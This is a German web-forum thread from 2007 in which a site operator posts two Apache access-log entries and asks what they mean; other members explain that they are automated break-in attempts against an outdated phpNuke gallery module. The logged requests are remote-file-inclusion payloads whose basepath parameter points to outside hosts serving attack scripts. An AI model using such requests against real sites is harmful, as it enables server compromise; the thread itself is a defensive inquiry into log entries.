Nachfrage zu Logs

Begonnen von Eismann1976, 14 November 2007, 20:30:28

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Eismann1976

Ich hab gerade mal so meine Logs durchgesehen und dabei folgenden Eintrag gefunden.

143.107.21.61 - - [14/Nov/2007:11:51:36 +0100] "GET /modules/My_eGallery/index.php?basepath=http://212.126.26.181/~kamila/exp667.txt? HTTP/1.1" 404 1134

85.119.242.74 - - [14/Nov/2007:11:27:22 +0100] "GET /modules/My_eGallery/index.php?basepath=http://www.displaysakha.ru/education/db?? HTTP/1.1" 404 1134


Kann mir wer sagen was da versucht wurde aufzurufen?

Vielleicht kann mich ja mal wer aufklären.

Gruß Eismann
LG Eismann


Kein Support per PN/ICQ/MSN ect.
Bitte schreibt eure Frage ins Forum, so haben Alle was von der Antwort.
Viele Antworten findest du auch im DOKUWIKI



http://www.wtj-clan.de | pragmaMx 0.1.11.2 &  1.12 RC2 | PHP: 5.2.9 | mysql: 5.1.33 | apache: 2.2.11 (Win32) & Microsoft-IIS/7.5

insanehsp

Also ich habe da nicht viel ahnung von, aber die beiden textinhalte sehen mir nach hackbots aus

http://212.126.26.181/~kamila/exp667.txt
http://www.displaysakha.ru/education/db?

Vielleicht Grasen die so durch das netz und suchen nach angriffbaren Seiten? .... Könnte ich mir vorstellen, aber da wird wahrscheinlich noch jemand fachkundigeres etwas zu sagen können
Werde zum Hörspielsprecher: Hoerspielprojekt.de
ODER
Besuche das Hörspiel-Forum: Hoertalk.de


Eismann1976

Die Dateien hab ich mir schon angesehen und vermute das auch.

Ich mach mir da z.Zt. keine großen Sorgen. Die Anfrage wurde ja mit 404 beantwortet.

ABER

Da ich meinen Server gerade neu machen darf nachdem mein phpmyadmin über Tage attakiert und schließlich gehackt wurde, schau ich nun besonders empfindlich auf die Logs.

Die Angriffe auf phpmyadmin sehe ich jetzt zwar immernoch (aber sie laufen jetzt ins Leere) jedoch finde ich zwischendrin immer wieder solche Aufrufe.
Das Modul ist ja Standartmäßig auch im PMX dabei und ich vermute mal es ist gegen solche Angriffe geschützt aber ich dachte mir eine kurze Nachfrage kann nicht schaden.

Gruß Eismann
LG Eismann


Kein Support per PN/ICQ/MSN ect.
Bitte schreibt eure Frage ins Forum, so haben Alle was von der Antwort.
Viele Antworten findest du auch im DOKUWIKI



http://www.wtj-clan.de | pragmaMx 0.1.11.2 &  1.12 RC2 | PHP: 5.2.9 | mysql: 5.1.33 | apache: 2.2.11 (Win32) & Microsoft-IIS/7.5

Andi

Moin :)

das sind die üblichen Dumm-Hackversuche zu veralteten phpnuke-Sicherheitslücken...
Hier speziell der: http://www.pragmamx.org/Forum-topic-9178.html
schön´s Grüssle, Andi